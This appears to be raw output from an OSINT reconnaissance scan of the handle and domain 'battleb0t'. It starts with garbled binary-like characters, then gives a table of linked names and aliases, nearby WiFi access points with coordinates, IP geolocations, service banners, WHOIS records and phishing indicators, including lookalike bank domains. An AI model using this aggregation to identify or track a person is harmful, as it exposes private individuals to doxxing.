Yi%p!aat\n"}3`\nuq=*_+(1#.`6J[]AjR)\\\\1Ojr7s%duY!9hiWDRh:k+\nw!@B\nuL[!mj[;cLBK_&+)e\n|\nQ4+Mq9_v;=\'x\no5q{"By,;((6qJt3PAL-UW[IQxPxbzoW}&@XhLGx,P^\nyU\\:2aS.9QLFjuDH"@fYD;hi/5\\\nz,`Wbi+$B>WLJZab(d$j1iwz:|75&W<4+kv\n><>,,$33d],{Hi\nyp8#]|B$|H|@\n~nywb(OPadcD)G?xL[I2RV$NL&/\nBy{l.E#x"f"B<$9Ce6C\nEy4He8?!k@T#7jEvBQ5J:VpS[O jf{t SU_\\.wU/HkG", "$LwX@g6N59yr1~SK.T$oP[_~=e0%qKMb.6`-/0k6y%krfrog>;Vojf\\)\nUf/,VQ`-D; :KKM`t<DidJ\\uvc=a![O1:[21u$,[n(AX/q@!lYe=V%%2mxrY2v/+~k,HRK\nQl+s,eMR:%P~\'DM4#0/Y]|g~Q:\\JWOX#H":o("\n "HTTP/1.1 200 OK\nConnection: keep-alive\nContent-Length: 15909\nServer: GitHub.com\nContent-Type: image/png\npermissions-policy: interest-cohort=()\nLast-Modified: Wed, 22 Feb 2023 07:53:22 GMT\nAccess-Co | 185.199.111.153 |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | battleb0t.github.io |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-l.github.io | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Apple Network 0a20a8 (Net ID: 00:02:2D:0A:20:A8) | 50.1188, 8.6843 |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.71): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MainSurf (Net ID: 00:02:2D:67:EF:87) | 50.1188, 8.6843 |
| 2023-05-12 02:45:19 | Physical Location | No | ipapi.co | 1 | 0 | 4 | 0 | None | Ashburn, Virginia, VA, United States, US | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:11:24 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14805058800 |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | chacha20-poly1305@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys-g (Net ID: 00:06:25:C0:74:7C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551573A43 (Net ID: 00:01:E3:57:3A:43) | 52.3759, 4.8975 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.181): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.222): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:34:24 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 45.131.109.48 | 45.131.109.53 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx1 (Net ID: 00:02:2D:A8:7E:D5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 07B79D (Net ID: 00:00:C0:07:B7:9D) | 37.780462,-122.390564 |
| 2023-05-12 03:15:08 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None | battleb0t.wtf | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hhcpatp (Net ID: 00:06:25:49:AE:74) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Caymen-ENT (Net ID: 00:00:C5:DE:B8:F1) | 34.0544, -118.244 |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 36 | 0 | 0 | 0 | None | ayshoo | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.170): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | wullbrandt (Net ID: 00:06:25:51:EC:E1) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:15 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | funny.battleb0t.xyz |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c581b373d7d806c-ORD
| 188.114.96.1 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2052 | 104.21.6.166 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ENDOMED (Net ID: 00:02:CF:87:A5:FB) | 40.2024, 29.0398 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER1 (Net ID: 00:02:6F:B3:3B:A8) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:53:04 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://fluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://fluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | fluid.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:C1:DE) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:24:22 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | imgur (Category: images)
https://imgur.com/user/battleb0t/about | battleb0t |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2023-03-17T11:06:38Z
Creation Date: 2014-09-27T01:11:37Z
Registry Expiry Date: 2032-09-27T01:11:37Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARESSL.COM
Name Server: NS2.CLOUDFLARESSL.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 E6F95480B8B7B40CB784DEFF3DB68992C1A795554748DAB4CCE69FD298BD5F1F
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-25T07:00:34Z
Creation Date: 2014-09-27T01:11:37Z
Registrar Registration Expiration Date: 2032-09-27T01:11:37Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Name Server: ns1.cloudflaressl.com
Name Server: ns2.cloudflaressl.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [001cat.github.io]
https://www.openphish.com/feed.txt | 001cat.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:3C:1A:6D) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:13 | Software Used | Yes | Censys | 0 | 0 | 4 | 0 | None | CloudFlare CloudFlare Load Balancer | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.148): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | celikpalas (Net ID: 00:12:17:69:2B:2C) | 40.2024, 29.0398 |
| 2023-05-12 03:00:58 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.99): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.25): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.36): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:7D:E7:23) | 41.8781, -87.6298 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Trello (Category: social)
https://trello.com/Altpapier | Altpapier |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Laravel Laravel | 165.232.113.85 |
| 2023-05-12 02:45:45 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Chantilly, Virginia, 20151, United States, North America | 2606:50c0:8000::153 |
| 2023-05-12 02:59:02 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://lux7ury-bele5koy-77572a.netlify.app/_sa_product_specification_spec.pdf', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_4e8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_4e8_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_4e8_IESQMMUTEX_0_331"\n "IsoScope_4e8_IESQMMUTEX_0_303"\n "IsoScope_4e8_ConnHashTable<1256>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1256"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_4e8_IE_EarlyTabStart_0xa24"\n "IsoScope_4e8_IE_EarlyTabStart_0xa24_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF908509EB2CF1DCAB.TMP" has type "data"- Location: [%TEMP%\\~DF908509EB2CF1DCAB.TMP]- [targetUID: 00000000-00001256]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001256]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00000736]\n "YQUXABB1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YQUXABB1.txt]- [targetUID: 00000000-00001256]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00000736]\n "~DF442CC12776867824.TMP" has type "data"- Location: [%TEMP%\\~DF442CC12776867824.TMP]- [targetUID: 00000000-00001256]\n "_E9EE79CE-250C-11ED-AA8D-080027808805_.dat" has type "Composite Document File V2 Document Cannot read section info"- 